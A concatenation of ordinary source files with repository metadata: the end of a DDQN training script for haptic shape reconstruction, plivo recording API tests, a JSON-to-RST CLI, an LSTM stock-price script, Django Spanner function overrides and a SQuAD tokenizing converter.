"ave_recon": self.ave_recon,
"epsilon": self.epsilon,
"epoch": self.epoch,
},
path + "_model",
)
# load previous state of training
def load(self, best=True):
if self.args.pretrained:
prefix = "l" if self.args.use_latent else "g"
if self.args.use_img:
if self.args.finger:
path = (
os.path.dirname(pretrained.__file__)
+ f"/policies/DDQN/{prefix}_v_t_p"
)
else:
path = (
os.path.dirname(pretrained.__file__)
+ f"/policies/DDQN/{prefix}_v_t_g"
)
else:
if self.args.finger:
path = (
os.path.dirname(pretrained.__file__)
+ f"/policies/DDQN/{prefix}_t_p"
)
else:
path = (
os.path.dirname(pretrained.__file__)
+ f"/policies/DDQN/{prefix}_t_g"
)
checkpoint = torch.load(path)
self.policy.load_state_dict(checkpoint["dqn_weights"])
else:
if best:
path = self.checkpoint_dir + "/best_model"
else:
path = self.checkpoint_dir + "/recent_model"
checkpoint = torch.load(path)
self.policy.load_state_dict(checkpoint["dqn_weights"])
self.episode = checkpoint["episode"] + 1
if not self.args.eval:
self.target_net.load_state_dict(checkpoint["target_weights"])
self.steps = checkpoint["steps"]
self.ave_reward = checkpoint["ave_reward"]
self.ave_recon = checkpoint["ave_recon"]
self.epsilon = checkpoint["epsilon"]
self.epoch = checkpoint["epoch"] + 1
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--cut",
type=float,
default=0.33,
help="The shared size of features in the GCN.",
)
parser.add_argument(
"--layers", type=int, default=4, help="Number of layers in the q network"
)
parser.add_argument(
"--hidden_dim",
type=int,
default=200,
help="hidden dimension size in layers in the q network",
)
parser.add_argument(
"--epochs", type=int, default=1000, help="Number of epochs to use."
)
parser.add_argument(
"--limit_data",
action="store_true",
default=False,
help="use less data, for debugging.",
)
parser.add_argument(
"--finger", action="store_true", default=False, help="use only one finger."
)
parser.add_argument(
"--eval",
action="store_true",
default=False,
help="Evaluate the trained model on the test set.",
)
parser.add_argument(
"--touch_location",
type=str,
default=os.path.dirname(pretrained.__file__) + "/reconstruction/touch/best/",
help="the location of the touch part prediction.",
)
parser.add_argument(
"--vision_location",
type=str,
default=os.path.dirname(pretrained.__file__) + "/reconstruction/vision/t_p/",
help="the location of the touch part prediction.",
)
parser.add_argument(
"--auto_location",
type=str,
default=os.path.dirname(pretrained.__file__) + "/reconstruction/auto/t_p/",
help="the location of the autoencoder part prediction.",
)
parser.add_argument(
"--number_points",
type=int,
default=30000,
help="number of points sampled for the chamfer distance.",
)
parser.add_argument(
"--seed", type=int, default=0, help="Setting for the random seed."
)
parser.add_argument(
"--lr", type=float, default=0.0003, help="Initial learning rate."
)
parser.add_argument(
"--env_batch_size",
type=int,
default=3,
help="Size of the batch of objects sampled from the environment",
)
parser.add_argument(
"--train_batch_size",
type=int,
default=16,
help="Size of the batch of transitions sampled for training the q network.",
)
parser.add_argument(
"--exp_id", type=str, default="test", help="The experiment name."
)
parser.add_argument(
"--exp_type", type=str, default="test", help="The experiment group."
)
parser.add_argument(
"--use_img", action="store_true", default=False, help="To use the image."
)
parser.add_argument(
"--patience",
type=int,
default=70,
help="How many epochs without imporvement before training stops.",
)
parser.add_argument(
"--loss_coeff", type=float, default=9000.0, help="Coefficient for loss term."
)
parser.add_argument(
"--num_grasps", type=int, default=5, help="Number of grasps to train with. "
)
parser.add_argument("--budget", type=int, default=5)
parser.add_argument(
"--normalization",
type=str,
choices=["first", "current", "none"],
default="first",
help="how to normalize the reward for the q network update ",
)
parser.add_argument(
"--mem_capacity", type=int, default=300, help="the size of the replay buffer"
)
parser.add_argument("--burn_in", type=int, default=20, help="ddqn burn in time")
parser.add_argument(
"--num_actions", type=int, default=50, help=" number of possible actions"
)
parser.add_argument("--gamma", type=float, default=0, help="ddqn gamma value")
parser.add_argument(
"--epsilon_start", type=float, default=1.0, help="ddqn initial epsilon value"
)
parser.add_argument(
"--epsilon_decay", type=float, default=0.9999, help="ddqn epsilon decay value"
)
parser.add_argument(
"--epsilon_end", type=float, default=0.01, help="ddqn minimum epsilon value"
)
parser.add_argument(
"--train_steps",
type=int,
default=20,
help="number of training iterations per epoch",
)
parser.add_argument(
"--valid_steps",
type=int,
default=10,
help="number of validation iterations per epoch",
)
parser.add_argument(
"--target_update",
type=int,
default=3000,
help="frequency of target network updates",
)
parser.add_argument(
"--use_latent",
action="store_true",
default=False,
help="if the latent embedding of objects is to be used",
)
parser.add_argument(
"--use_recon",
action="store_true",
default=False,
help="if the object prediction is to be directly used",
)
parser.add_argument(
"--visualize",
action="store_true",
default=False,
help="visualize predictions and actions while evaluating",
)
parser.add_argument(
"--pretrained_recon",
action="store_true",
default=False,
help="use the pretrained reconstruction models to train",
)
parser.add_argument(
"--pretrained",
action="store_true",
default=False,
help="use the pretrained policy",
)
args = parser.parse_args()
trainer = Engine(args)
trainer()
| 35.090909
| 118
| 0.559046
|
16af61e638573807c8563c7163fbde1370bb1cab
| 5,540
|
py
|
Python
|
tests/resources/test_recordings.py
|
burhanahmed-plivo/plivo-python
|
61f86f20efb2bdd30a9ae40ed837c20af42f20b9
|
[
"MIT"
] | null | null | null |
tests/resources/test_recordings.py
|
burhanahmed-plivo/plivo-python
|
61f86f20efb2bdd30a9ae40ed837c20af42f20b9
|
[
"MIT"
] | null | null | null |
tests/resources/test_recordings.py
|
burhanahmed-plivo/plivo-python
|
61f86f20efb2bdd30a9ae40ed837c20af42f20b9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from datetime import datetime
import plivo
from tests.base import PlivoResourceTestCase
from tests.decorators import with_response
class RecordingTest(PlivoResourceTestCase):
@with_response(200)
def test_list(self):
recordings = self.client.recordings.list(
add_time__gt=datetime(2017, 4, 15, 1, 1, 1),
add_time__gte=datetime(2017, 4, 15, 1, 1, 1),
add_time__lt=datetime(2017, 4, 15, 1, 1, 1),
add_time__lte=datetime(2017, 4, 15, 1, 1, 1, 123))
# Test if ListResponseObject's __iter__ is working correctly
self.assertEqual(len(list(recordings)), 3)
# Verifying the endpoint hit
self.assertUrlEqual(
'https://voice.plivo.com/v1/Account/MAXXXXXXXXXXXXXXXXXX/Recording/?add_time__gt=2017-04-15+01%3A01%3A01&add_time__lt=2017-04-15+01%3A01%3A01&add_time__gte=2017-04-15+01%3A01%3A01&add_time__lte=2017-04-15+01%3A01%3A01.000123&limit=20&offset=0',
self.client.current_request.url)
# Verifying the method used
self.assertEqual('GET', self.client.current_request.method)
# Verifying if the Account specific changes and parsing happened
self.assertEqual('fc2716b0-1c8b-11e4-bwad-842b2b17453e',
recordings.objects[1].id)
with self.assertRaises(plivo.exceptions.ValidationError):
recordings = self.client.recordings.list(limit=100)
def test_recording_list_by_subaccount(self):
expected_response = {
'account':
'/v1/Account/MANWVLYTK4ZWU1YTY4ZT/',
'api_id':
'323972b2-0db3-11e4-a2d1-22000ac5040c',
'auth_id':
'SAXXXXXXXXXXXXXXXXXX',
'auth_token':
'MTZjYWM0YzVjNjMwZmVmODFiNWJjNWJmOGJjZjgw',
'created':
'2014-07-17',
'enabled':
False,
'modified':
None,
'name':
'Chewbacca',
'resource_uri':
'/v1/Account/MANWVLYTK4ZWU1YTY4ZT/Subaccount/SAMTVIYJDIYWYYMZHLYZ/'
}
self.client.set_expected_response(
status_code=200, data_to_return=expected_response)
account_details = self.client.subaccounts.get('SA' + 'X' * 18)
expected_response = {
'api_id': 'ff25223a-1c9f-11e4-80aa-12313f048015',
'meta': {
'limit':
3,
'next':
'/v1/Account/MANWVLYTK4ZWU1YTY4ZT/Recording/?limit=3&offset=3',
'offset':
0,
'previous':
None,
'total_count':
948
},
'objects': []
}
self.client.set_expected_response(
status_code=200, data_to_return=expected_response)
with self.assertRaises(plivo.exceptions.ValidationError):
recordings = self.client.recordings.list(
subaccount='SA' + 'X' * 17)
recordings = self.client.recordings.list(
subaccount='SA' + 'X' * 18, call_uuid='SomeCallUUID')
# Verifying the endpoint hit
self.assertUrlEqual(
'https://voice.plivo.com/v1/Account/MAXXXXXXXXXXXXXXXXXX/Recording/?call_uuid=SomeCallUUID&limit=20&subaccount=SAXXXXXXXXXXXXXXXXXX&offset=0',
self.client.current_request.url)
# Verifying the method used
self.assertEqual('GET', self.client.current_request.method)
with self.assertRaises(plivo.exceptions.ValidationError):
recordings = self.client.recordings.list(limit=100)
recordings = self.client.recordings.list(
subaccount=account_details, call_uuid='SomeCallUUID')
# Verifying the endpoint hit
self.assertUrlEqual(
'https://voice.plivo.com/v1/Account/MAXXXXXXXXXXXXXXXXXX/Recording/?call_uuid=SomeCallUUID&limit=20&subaccount=SAXXXXXXXXXXXXXXXXXX&offset=0',
self.client.current_request.url)
# Verifying the method used
self.assertEqual('GET', self.client.current_request.method)
@with_response(200)
def test_get(self):
recording = self.client.recordings.get(
'c2186400-1c8c-11e4-a664-0026b945b52x')
self.assertResponseMatches(recording)
# Verifying the endpoint hit
self.assertEqual(
'https://voice.plivo.com/v1/Account/MAXXXXXXXXXXXXXXXXXX/Recording/c2186400-1c8c-11e4-a664-0026b945b52x/',
self.client.current_request.url)
# Verifying the method used
self.assertEqual('GET', self.client.current_request.method)
# Verifying the object type returned
self.assertEqual(plivo.resources.recordings.Recording,
recording.__class__)
# Verifying if the Account specific changes and parsing happened
self.assertEqual('c2186400-1c8c-11e4-a664-0026b945b52x', recording.id)
self.assertEqual('345100.00000', recording.recording_duration_ms)
@with_response(204)
def test_delete(self):
response = self.client.recordings.delete(
'c2186400-1c8c-11e4-a664-0026b945b52x')
# Verifying the endpoint hit
self.assertEqual(
'https://voice.plivo.com/v1/Account/MAXXXXXXXXXXXXXXXXXX/Recording/c2186400-1c8c-11e4-a664-0026b945b52x/',
self.client.current_request.url)
# Verifying the method used
self.assertEqual('DELETE', self.client.current_request.method)
| 36.688742
| 256
| 0.629242
|
d25189e4bf5ced157698f78e6dc7aebe1ee3455f
| 3,790
|
py
|
Python
|
json2rst/cmd.py
|
zed-eiq/bad-json-to-rst-tables
|
e9f022f68e1ea292370261c9b0c9116915802438
|
[
"Apache-2.0"
] | null | null | null |
json2rst/cmd.py
|
zed-eiq/bad-json-to-rst-tables
|
e9f022f68e1ea292370261c9b0c9116915802438
|
[
"Apache-2.0"
] | null | null | null |
json2rst/cmd.py
|
zed-eiq/bad-json-to-rst-tables
|
e9f022f68e1ea292370261c9b0c9116915802438
|
[
"Apache-2.0"
] | 1
|
2021-03-24T14:38:50.000Z
|
2021-03-24T14:38:50.000Z
|
import argparse
import logging
from pathlib import Path
from typing import List
from . import utils
from .pivot import Pivot
logging.basicConfig(level=logging.DEBUG)
def _cli() -> argparse.Namespace:
"""
CLI helper.
Returns:
        an argparse.Namespace object, which looks very much like a NamedTuple
"""
parser = argparse.ArgumentParser()
cmd_rst = parser.add_argument_group("General options")
cmd_rst.add_argument(
"--input",
dest="infiles",
required=True,
help="Input JSON file, or a directory containing JSON files.")
cmd_rst.add_argument(
"--output",
dest="outdir",
default=".",
help="Output directory. Defaults to current directory.")
cmd_pivot = parser.add_argument_group("Pivot a directory of JSON files.")
cmd_pivot.add_argument(
"pivot",
type=bool,
nargs="?",
default=False,
help="""Specify 'pivot' to pivot JSON files.
            Collects JSON files from --input, extracts values from fields
            that match names in --headers, and writes them to a csv-table.
"""
)
cmd_pivot.add_argument(
"--headers",
dest="pivot_headers",
type=str,
required=False,
help="""Required for pivot.
Add a list of header names as comma-separated values.
JSON files from --input will be pivoted against this list.
Headers MUST BE UNIQUE (RFC8259 §4). Duplicate headers are discarded.
E.g.: --headers='key1,key2,key3'
"""
)
cmd_pivot.add_argument(
"--strict",
action="store_true",
required=False,
help="""Strict mode for pivot.
When set, JSON files must have all fields specified with --headers.
"""
)
cmd_pivot.add_argument(
"--sort-by",
dest="sort_by",
type=str,
required=False,
help="""Sort the pivot table by a given key.
Specify only one key.
"""
)
cmd_pivot.add_argument(
"--sort-order",
dest="sort_order",
type=str,
required=False,
help="""Sort --sort-by in 'ascending' or 'descending' order."""
)
cmd_pivot.add_argument(
"--csv-out",
dest="csv_out",
type=str,
required=False,
help="Name of output CSV file saved in --output dir."
)
return parser.parse_args()
def _convert_json_to_rst(infiles: str, outdir: str):
infile_list = utils.smart_filepaths(infiles)
outputdir = Path(outdir).absolute()
for thisfile in infile_list:
with open(thisfile) as f:
output = utils.render_page(thisfile, f.read())
utils.write_file(
Path.joinpath(
outputdir,
Path(thisfile).stem + ".rst"),
output
)
def _pivot(args: argparse.Namespace):
"""
TODO: All this file wrangling should be offloaded
"""
pivot_headers = _parse_headers(args.pivot_headers)
infile_list = utils.smart_filepaths(args.infiles)
Pivot(
infile_list,
pivot_headers,
args.strict,
args.csv_out,
args.sort_by,
args.sort_order,
).pivot()
def _parse_headers(raw_headers: str) -> List[str]:
    """
    Args:
        raw_headers (str): Value from args.pivot_headers.
    Returns:
        A list of unique headers; duplicates are discarded and order is preserved.
    """
    output = list()
    for header in raw_headers.split(sep=","):
        header = header.strip()
        if header not in output:  # Allow only unique headers
            output.append(header)
    logging.debug("Pivoting JSON files using headers: {}".format(output))
    return output
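# Illustrative example (hypothetical input, not from the CLI):
#   _parse_headers("key1, key2,key1") -> ["key1", "key2"]
# Surrounding whitespace is stripped and repeated names are dropped, keeping
# the first occurrence's position for the pivot table columns.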
def cmd():
args = _cli()
logging.debug(args)
if not args.pivot:
_convert_json_to_rst(args.infiles, args.outdir)
else:
_pivot(args)
logging.debug("YOU HAVE REACHED THE END OF EARLY ACCESS CONTENT.")
| 23.836478
| 77
| 0.622164
|
4f4358c3f2bfb4eba389a9ed0317af4a2cd514b7
| 2,165
|
py
|
Python
|
GoogleStockPriceRNN.py
|
sd1998/GoogleStockPriceRNN
|
fb4da83ab3137d6c3eecfa3b964daa80ad9a8324
|
[
"Apache-2.0"
] | null | null | null |
GoogleStockPriceRNN.py
|
sd1998/GoogleStockPriceRNN
|
fb4da83ab3137d6c3eecfa3b964daa80ad9a8324
|
[
"Apache-2.0"
] | null | null | null |
GoogleStockPriceRNN.py
|
sd1998/GoogleStockPriceRNN
|
fb4da83ab3137d6c3eecfa3b964daa80ad9a8324
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
dataset_train = pd.read_csv('Google_Stock_Price_Train.csv')
training_set = dataset_train.iloc[:, 1:2].values
from sklearn.preprocessing import MinMaxScaler
sc = MinMaxScaler(feature_range = (0, 1))
training_set_scaled = sc.fit_transform(training_set)
X_train = []
y_train = []
for i in range(60, 1258):
X_train.append(training_set_scaled[i-60:i, 0])
y_train.append(training_set_scaled[i, 0])
X_train, y_train = np.array(X_train), np.array(y_train)
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
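# Shape sketch: the loop above produces 1258 - 60 = 1198 sliding windows of the
# previous 60 scaled prices, so after the reshape X_train is (1198, 60, 1)
# -- (samples, timesteps, features), the layout Keras LSTM layers expect --
# and y_train is (1198,).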
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import Dropout
regressor = Sequential()
regressor.add(LSTM(units = 50, return_sequences = True, input_shape = (X_train.shape[1], 1)))
regressor.add(Dropout(0.2))
regressor.add(LSTM(units = 50, return_sequences = True))
regressor.add(Dropout(0.2))
regressor.add(LSTM(units = 50, return_sequences = True))
regressor.add(Dropout(0.2))
regressor.add(LSTM(units = 50))
regressor.add(Dropout(0.2))
regressor.add(Dense(units = 1))
regressor.compile(optimizer = 'adam', loss = 'mean_squared_error')
regressor.fit(X_train, y_train, epochs = 100, batch_size = 32)
dataset_test = pd.read_csv('Google_Stock_Price_Test.csv')
real_stock_price = dataset_test.iloc[:, 1:2].values
dataset_total = pd.concat((dataset_train['Open'], dataset_test['Open']), axis = 0)
inputs = dataset_total[len(dataset_total) - len(dataset_test) - 60:].values
inputs = inputs.reshape(-1,1)
inputs = sc.transform(inputs)
X_test = []
for i in range(60, 80):
X_test.append(inputs[i-60:i, 0])
X_test = np.array(X_test)
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
predicted_stock_price = regressor.predict(X_test)
predicted_stock_price = sc.inverse_transform(predicted_stock_price)
plt.plot(real_stock_price, color = 'red', label = 'Real Google Stock Price')
plt.plot(predicted_stock_price, color = 'blue', label = 'Predicted Google Stock Price')
plt.title('Google Stock Price Prediction')
plt.xlabel('Time')
plt.ylabel('Google Stock Price')
plt.legend()
plt.show()
| 40.849057
| 93
| 0.757506
|
e21258a3eccf78fde0dfbc0bf8e9a764669b2a27
| 3,742
|
py
|
Python
|
django_spanner/functions.py
|
MShaffar19/python-spanner-django
|
62c22b113b470776cddacbab92c4428c6581c551
|
[
"BSD-3-Clause"
] | 1
|
2020-12-01T14:30:04.000Z
|
2020-12-01T14:30:04.000Z
|
django_spanner/functions.py
|
prakhargurunani/python-spanner-django
|
818324708e9ca46fbd80c47745bdf38e8a1a069c
|
[
"BSD-3-Clause"
] | 1
|
2021-02-23T12:32:32.000Z
|
2021-02-23T12:32:32.000Z
|
django_spanner/functions.py
|
prakhargurunani/python-spanner-django
|
818324708e9ca46fbd80c47745bdf38e8a1a069c
|
[
"BSD-3-Clause"
] | 1
|
2020-10-04T10:04:55.000Z
|
2020-10-04T10:04:55.000Z
|
# Copyright 2020 Google LLC
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
import math
from django.db.models.expressions import Func, Value
from django.db.models.functions import (
Cast,
Chr,
ConcatPair,
Cot,
Degrees,
Left,
Log,
Ord,
Pi,
Radians,
Right,
StrIndex,
Substr,
)
class IfNull(Func):
function = "IFNULL"
arity = 2
def cast(self, compiler, connection, **extra_context):
# Account for a field's max_length using SUBSTR.
max_length = getattr(self.output_field, "max_length", None)
if max_length is not None:
template = "SUBSTR(" + self.template + ", 0, %s)" % max_length
else:
template = self.template
return self.as_sql(
compiler, connection, template=template, **extra_context
)
def chr_(self, compiler, connection, **extra_context):
return self.as_sql(
compiler,
connection,
template="CODE_POINTS_TO_STRING([%(expressions)s])",
**extra_context
)
def concatpair(self, compiler, connection, **extra_context):
# Spanner's CONCAT function returns null if any of its arguments are null.
# Prevent that by converting null arguments to an empty string.
clone = self.copy()
clone.set_source_expressions(
IfNull(e, Value("")) for e in self.get_source_expressions()
)
return clone.as_sql(compiler, connection, **extra_context)
def cot(self, compiler, connection, **extra_context):
return self.as_sql(
compiler,
connection,
template="(1 / TAN(%(expressions)s))",
**extra_context
)
def degrees(self, compiler, connection, **extra_context):
return self.as_sql(
compiler,
connection,
template="((%%(expressions)s) * 180 / %s)" % math.pi,
**extra_context
)
def left_and_right(self, compiler, connection, **extra_context):
return self.get_substr().as_spanner(compiler, connection, **extra_context)
def log(self, compiler, connection, **extra_context):
# This function is usually Log(b, x) returning the logarithm of x to the
# base b, but on Spanner it's Log(x, b).
clone = self.copy()
clone.set_source_expressions(self.get_source_expressions()[::-1])
return clone.as_sql(compiler, connection, **extra_context)
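# Illustrative (hypothetical expression, not from this module): a Django query
# using Log(Value(2), F("x")) would normally compile to LOG(2, x); reversing the
# source expressions above makes it compile to LOG(x, 2), the argument order
# Spanner expects per the comment in log().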
def ord_(self, compiler, connection, **extra_context):
return self.as_sql(
compiler,
connection,
template="TO_CODE_POINTS(%(expressions)s)[OFFSET(0)]",
**extra_context
)
def pi(self, compiler, connection, **extra_context):
return self.as_sql(
compiler, connection, template=str(math.pi), **extra_context
)
def radians(self, compiler, connection, **extra_context):
return self.as_sql(
compiler,
connection,
template="((%%(expressions)s) * %s / 180)" % math.pi,
**extra_context
)
def strindex(self, compiler, connection, **extra_context):
return self.as_sql(
compiler, connection, function="STRPOS", **extra_context
)
def substr(self, compiler, connection, **extra_context):
return self.as_sql(
compiler, connection, function="SUBSTR", **extra_context
)
def register_functions():
Cast.as_spanner = cast
Chr.as_spanner = chr_
ConcatPair.as_spanner = concatpair
Cot.as_spanner = cot
Degrees.as_spanner = degrees
Left.as_spanner = left_and_right
Log.as_spanner = log
Ord.as_spanner = ord_
Pi.as_spanner = pi
Radians.as_spanner = radians
Right.as_spanner = left_and_right
StrIndex.as_spanner = strindex
Substr.as_spanner = substr
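# Usage note (assumption about the surrounding backend, not shown in this file):
# register_functions() is presumably called once when the Spanner database
# backend loads, so Django's compiler picks up each as_spanner() override in
# place of the default as_sql() rendering for these Func classes.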
| 26.167832
| 78
| 0.663014
|
a83383c3006bb95b83fd1f186c757cf42753c4c3
| 3,299
|
py
|
Python
|
breakdown/templatetags.py
|
Goldmund-Wyldebeast-Wunderliebe/jinja-breakdown
|
c6296d54ea6c9f1185039cab7495d5833ba6437f
|
[
"Apache-2.0"
] | 1
|
2020-08-04T04:51:28.000Z
|
2020-08-04T04:51:28.000Z
|
breakdown/templatetags.py
|
Goldmund-Wyldebeast-Wunderliebe/jinja-breakdown
|
c6296d54ea6c9f1185039cab7495d5833ba6437f
|
[
"Apache-2.0"
] | null | null | null |
breakdown/templatetags.py
|
Goldmund-Wyldebeast-Wunderliebe/jinja-breakdown
|
c6296d54ea6c9f1185039cab7495d5833ba6437f
|
[
"Apache-2.0"
] | null | null | null |
"""
Breakdown.py - 2011 Concentric Sky
Lightweight jinja2 template prototyping server with support for
some custom template tags
Copyright 2011 Concentric Sky, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import six
import breakdown
from breakdown.settings import STATIC_URL
import jinja2
import markupsafe
import os
import random
__all__ = ["image", "greeking"]
Markup = markupsafe.Markup
min_func = min
max_func = max
env = jinja2.Environment()
def image(cache_path, width, height):
""" Generate a custom-sized sample image """
# Create unique path
size = (width, height)
filename = "%sx%s.png" % (width, height)
path = os.path.join(cache_path, filename)
# Check if image has already been created
if not os.path.exists(path):
# Generate new image
sample = breakdown.pkg_path("img/sample.png")
if not os.path.exists(sample):
return Markup(u"<img/>")
else:
try:
# Try scaling the image using PIL
from PIL import Image
source = Image.open(sample)
scaled = source.resize(size, Image.BICUBIC)
scaled.save(path)
except ImportError:
                # If we couldn't find PIL, just copy the image
inf = open(sample, "rb")
outf = open(path, "wb")
outf.write(inf.read())
return Markup(u'<img src="%s%s">' % (STATIC_URL, filename))
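# Usage sketch (placeholder arguments): image("/tmp/cache", 300, 200) writes or
# reuses "/tmp/cache/300x200.png" -- scaled with PIL when available, otherwise a
# straight copy of the bundled sample -- and returns an <img> tag pointing at
# STATIC_URL + "300x200.png".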
def greeking(mode=None, min=50, max=100):
""" Generate a block of various HTML text """
# Get a blob of lipsum
minimum = max_func(min, 6 * 4)
maximum = max_func(max, minimum + 1)
blob = env.globals["lipsum"](html=False, n=1, min=minimum, max=maximum).split(" ")
# Wrap text in HTML elements at random points
wrappers = [
("<strong>", "</strong>"),
("<em>", "</em>"),
("<code>", "</code>"),
('<a href="#">', "</a>"),
]
random.shuffle(wrappers)
thresh = 5
    pointers = random.sample(range(len(blob) // thresh), len(wrappers))
for i, ptr in enumerate(pointers):
ptr = ptr * thresh
length = random.randint(2, thresh)
blob[ptr] = wrappers[i][0] + blob[ptr]
blob[ptr + length] = wrappers[i][1] + blob[ptr + length]
html = "<p>" + " ".join(blob) + "</p>"
# Generate random lists
lists = []
for type in ("ul", "ol"):
items = []
for i in range(random.randint(3, 4)):
items.append(
"<li>%s</li>" % env.globals["lipsum"](html=False, n=1, min=5, max=10)
)
lists.append(items)
html += """
<ul>
%s
</ul>
<ol>
%s
</ol>
""" % (
"\n".join(lists[0]),
"\n".join(lists[1]),
)
return Markup(six.text_type(html))
| 28.196581
| 86
| 0.593816
|
c2a3d179dc713d65a8a409b53318592e3fa46b76
| 1,888
|
py
|
Python
|
forum_tag/forum_tag/spiders/search_spider.py
|
chrisfromthelc/wpcom-forum-scraper
|
82d123f243c6830c2529a5fdfadffccef4975e36
|
[
"BSD-3-Clause"
] | null | null | null |
forum_tag/forum_tag/spiders/search_spider.py
|
chrisfromthelc/wpcom-forum-scraper
|
82d123f243c6830c2529a5fdfadffccef4975e36
|
[
"BSD-3-Clause"
] | 1
|
2022-03-02T14:53:20.000Z
|
2022-03-02T14:53:20.000Z
|
forum_tag/forum_tag/spiders/search_spider.py
|
chrisfromthelc/wpcom-forum-scraper
|
82d123f243c6830c2529a5fdfadffccef4975e36
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import scrapy
class TagSpiderSpider(scrapy.Spider):
name = 'tag_spider'
allowed_domains = ["wordpress.com"]
start_urls = ['https://wordpress.com/forums/topic-tag/seo/'] # edit this URL for the tag URL you want
custom_settings = {'CLOSESPIDER_PAGECOUNT': 100}
def parse(self, response):
# follow links to topic pages
for href in response.css('a.jetpack-instant-search__search-result-title-link::attr(href)'):
yield response.follow(href, self.parse_topic)
#follow pagination links
for href in response.css('.bbp-pagination-links a.next::attr(href)'):
yield response.follow(href, self.parse)
# next_page = response.css('.nav a.next::attr(href)').extract_first()
# if next_page is not None:
# yield response.follow(next_page, callback=self.parse)
def parse_topic(self, response):
def extract_first_with_css(query):
return response.css(query).extract_first().strip()
def extract_with_xpath(query):
return response.xpath(query).extract()
# for post in response:
#
# item = {}
#
# item['topic_title'] = extract_first_with_css('h1::text').replace("\xa0", " ")
# item['topic_url'] = response.request.url
# item['topic_messages_text'] = ''.join(extract_with_xpath('//div[@class="bbp-reply-content"]/p/text()')).replace("\n", " ").replace("\xa0", " ")
#
# return item
yield {
'topic_title': extract_first_with_css('h1::text').replace("\xa0", " "),
'topic_url': response.request.url,
'topic_messages_text': ' '.join(extract_with_xpath('//div[@class="bbp-reply-content"]/p/text()')).replace("\n", " ").replace("\xa0", " ")
}
pass
| 38.530612
| 161
| 0.587924
|
59e061169fa08b5f0a419e3a4899b6b0f6d11573
| 6,820
|
py
|
Python
|
tools/accuracy_checker/accuracy_checker/annotation_converters/squad_emb.py
|
APrigarina/open_model_zoo
|
b1ff98b64a6222cf6b5f3838dc0271422250de95
|
[
"Apache-2.0"
] | 1,031
|
2020-07-16T08:30:57.000Z
|
2022-03-30T19:42:52.000Z
|
tools/accuracy_checker/accuracy_checker/annotation_converters/squad_emb.py
|
APrigarina/open_model_zoo
|
b1ff98b64a6222cf6b5f3838dc0271422250de95
|
[
"Apache-2.0"
] | 966
|
2020-07-16T08:13:00.000Z
|
2022-03-31T18:09:18.000Z
|
tools/accuracy_checker/accuracy_checker/annotation_converters/squad_emb.py
|
APrigarina/open_model_zoo
|
b1ff98b64a6222cf6b5f3838dc0271422250de95
|
[
"Apache-2.0"
] | 440
|
2020-07-16T12:52:50.000Z
|
2022-03-31T14:21:41.000Z
|
"""
Copyright (c) 2018-2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import multiprocessing
import unicodedata
import string
import numpy as np
from ..representation import QuestionAnsweringEmbeddingAnnotation
from ..utils import read_json
from ..config import PathField, NumberField, BoolField
from .format_converter import BaseFormatConverter, ConverterReturn
# split a word into vocab items and get token codes
# iteratively return the codes
def encode_by_voc(w, vocab):
# remove mark and control chars
def clean_word(w):
wo = "" # accumulator for output word
for c in unicodedata.normalize("NFD", w):
c_cat = unicodedata.category(c)
# remove mark nonspacing code and controls
if c_cat != "Mn" and c_cat[0] != "C":
wo += c
return wo
w = clean_word(w)
res = []
for s0, e0 in split_to_words(w):
s, e = s0, e0
tokens = []
while e > s:
subword = w[s:e] if s == s0 else "##" + w[s:e]
if subword in vocab:
tokens.append(vocab[subword])
s, e = e, e0
else:
e -= 1
if s < e0:
tokens = [vocab['[UNK]']]
res.extend(tokens)
return res
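# Worked example with a hypothetical vocabulary (not the real BERT vocab):
#   vocab = {"un": 0, "##aff": 1, "##able": 2, "[UNK]": 3}
#   encode_by_voc("unaffable", vocab) -> [0, 1, 2]
# i.e. greedy longest-match into "un", "##aff", "##able"; if a word cannot be
# fully consumed this way, the whole word falls back to the [UNK] id.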
# split big text into words by spaces
# iteratively return words
def split_to_words(text):
prev_is_sep = True # mark initial prev as space to start word from 0 char
for i, c in enumerate(text + " "):
is_punc = (c in string.punctuation or unicodedata.category(c)[0] == "P")
cur_is_sep = (c.isspace() or is_punc)
if prev_is_sep != cur_is_sep:
if prev_is_sep:
start = i
else:
yield start, i
del start
if is_punc:
yield i, i+1
prev_is_sep = cur_is_sep
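# Illustrative behaviour (hypothetical input): list(split_to_words("hello, world"))
# yields (0, 5), (5, 6) and (7, 12) -- the spans of "hello", "," and "world" --
# because punctuation is emitted as its own single-character span.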
# take a big text and return a list of token ids and the start-end positions of each id in the original text
def text_to_tokens(text, vocab_or_tokenizer):
tokens_id = []
tokens_se = []
for s, e in split_to_words(text):
if hasattr(vocab_or_tokenizer, 'encode'):
#vocab_or_tokenizer is tokenizer
toks = vocab_or_tokenizer.encode(text[s:e], add_special_tokens=False)
else:
#vocab_or_tokenizer is tokens dictionary
toks = encode_by_voc(text[s:e], vocab_or_tokenizer)
for tok in toks:
tokens_id.append(tok)
tokens_se.append((s, e))
return tokens_id, tokens_se
def encode_squad_article(article, vocab, do_lower_case):
def encode_txt(txt):
if do_lower_case:
txt = txt.lower()
return text_to_tokens(txt, vocab)
for par in article['paragraphs']:
par['context_enc'], par['context_enc_pos'] = encode_txt(par['context'])
for qa in par['qas']:
qa['question_enc'], qa['question_enc_pos'] = encode_txt(qa['question'])
return article
